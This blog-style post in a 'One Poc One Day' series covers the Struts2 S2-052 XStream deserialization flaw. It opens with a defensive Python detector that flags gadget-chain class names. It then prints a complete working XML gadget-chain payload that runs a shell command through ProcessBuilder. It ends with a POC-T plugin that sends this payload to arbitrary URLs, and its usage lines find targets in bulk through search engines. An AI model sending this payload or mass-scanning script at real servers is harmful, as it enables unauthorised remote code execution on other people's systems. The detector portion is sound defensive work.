【One Poc One Day】—— Struts2 052

# 0x01

One Poc One Day —— Struts2 052

# 0x02

## How it works

The Struts2 REST plugin hands XML request bodies to its XStream handler, which deserializes them with the XStream library without any filtering of the classes it is allowed to instantiate. Deserializing attacker-supplied XML can therefore lead to remote code execution, and any attacker who can craft a malicious XML body can use it to escalate privileges.
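Because the unsafe path is "any class named in a `class=` attribute gets instantiated", the defensive counterpart is to look at which classes an inbound XML body names before (or instead of) letting XStream see it. The script below is an added example written for this post, not code from the original article or from the POC-T project: it parses a request body with the standard library, flags the gadget-chain classes that appear in the payload discussed on this page (the class and tag lists are an assumption drawn from that payload, not an exhaustive blocklist), and only bothers for XML content types, which is the route the REST plugin takes to XStream. The two request bodies are constructed samples; the malicious one is a deliberately incomplete fragment that carries the indicators without being a working chain.

```python
import xml.etree.ElementTree as ET

# Classes a legitimate REST plugin request never needs to name. Each one is a link in the
# S2-052 gadget chain shown on this page (assumed list, derived from that payload).
SUSPICIOUS_CLASSES = (
    "java.lang.ProcessBuilder",
    "java.lang.ProcessBuilder$NullInputStream",
    "javax.crypto.CipherInputStream",
    "javax.imageio.spi.FilterIterator",
    "javax.imageio.ImageIO$ContainsFilter",
    "com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data",
    "com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource",
)
# Element names that are themselves JDK-internal types used as the chain's entry point.
SUSPICIOUS_TAGS = ("jdk.nashorn.internal.objects.NativeString",)

# Content types the REST plugin routes to the XStream handler (assumed for this example).
XML_CONTENT_TYPES = ("application/xml", "text/xml")


def should_inspect(headers):
    """True when the request body would reach the XML handler (header names are case-insensitive)."""
    for name, value in headers.items():
        if name.lower() == "content-type":
            media_type = value.split(";")[0].strip().lower()
            return media_type in XML_CONTENT_TYPES
    return False


def inspect_xml_body(body):
    """Return a list of human-readable findings for an XML body; an empty list means clean.

    An unparseable body is reported as a finding too: a genuine REST client sends well-formed
    XML, so failing closed here costs nothing and keeps malformed probes visible in logs.
    """
    findings = []
    try:
        root = ET.fromstring(body)
    except ET.ParseError as err:
        return ["unparseable XML: %s" % err]

    for elem in root.iter():
        # XStream honours class="..." on any element, so that attribute is where the
        # attacker chooses what gets instantiated. Legitimate payloads may use class=
        # for real subtypes, so match the dangerous names, not the attribute itself.
        cls = elem.get("class")
        if cls in SUSPICIOUS_CLASSES:
            findings.append("element <%s> instantiates %s" % (elem.tag, cls))
        if elem.tag in SUSPICIOUS_TAGS:
            findings.append("gadget entry point <%s>" % elem.tag)
        # <method><class>X</class><name>start</name></method> is the reflective call the
        # chain ends in; report it even if the surrounding element was not flagged.
        if elem.tag == "method":
            klass = elem.findtext("class")
            if klass in SUSPICIOUS_CLASSES:
                findings.append("reflective call %s.%s" % (klass, elem.findtext("name")))
    return findings


def is_s2052_like(body):
    """Boolean convenience wrapper for use in a request filter or log triage loop."""
    return bool(inspect_xml_body(body))


# Constructed sample bodies (not captured traffic). The malicious one is a fragment that
# only carries the indicators; it is not a functioning chain.
BENIGN_SAMPLE = '<order><id>42</id><customer class="vip">Bob</customer></order>'
MALICIOUS_SAMPLE = (
    '<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags>'
    '<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">'
    '<next class="java.lang.ProcessBuilder"><command><string>id</string></command></next>'
    '<filter class="javax.imageio.ImageIO$ContainsFilter"><method>'
    '<class>java.lang.ProcessBuilder</class><name>start</name></method></filter>'
    '</value></jdk.nashorn.internal.objects.NativeString></entry></map>'
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_SAMPLE), ("malicious", MALICIOUS_SAMPLE)):
        print(label, inspect_xml_body(body))
```

Running the block prints an empty list for the benign order document and five findings for the fragment, including the reflective `java.lang.ProcessBuilder.start` call. The design point is that the check is on class names, not on the presence of `class=` attributes: XStream-backed REST APIs legitimately carry those for polymorphic fields, so a filter that rejects every `class=` would break real clients while the allowlist-style match above does not.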

## Payload

```xml
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>touch</string>
                        <string>/tmp/success</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>
```

## Poc

Um... all of this is to go with POC-T: adapt more PoCs to it and build up your own collection of scripts.

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/yizhimanpadewoniu
# author = am4zing

"""
Struts2 S2-052
Affected versions: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

Usage:
python POC-T.py -s struts2-s2052 -aG "inurl:login.action" --gproxy "http 127.0.0.1 1080"
python POC-T.py -s struts2-s2052 -aZ "login.action"
python POC-T.py -s struts2-s2052 -iF FILE.txt
"""

import requests


def poc(url):
    # POC-T hands over bare hosts as well as full URLs; default to plain http
    if '://' not in url:
        url = 'http://' + url
    try:
        header = dict()
        header['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        # The REST plugin only routes the body to the XStream handler for an XML content type
        header['Content-Type'] = "application/xml"
        # header['Accept'] = "*/*"
        header['Connection'] = "close"
        header['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        payload = '''<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>'''
        # A timeout keeps one unresponsive host from stalling the whole POC-T batch
        response_data = requests.post(url, data=payload, headers=header, timeout=10)
        # A vulnerable handler fails inside the gadget chain: an HTTP 500, or a stack
        # trace in the body that mentions java.security.Provider$Service
        if response_data.status_code == 500 or r"java.security.Provider$Service" in response_data.text:
            return '[s2-052]' + url
        else:
            return response_data.text

    except Exception:
        return False
```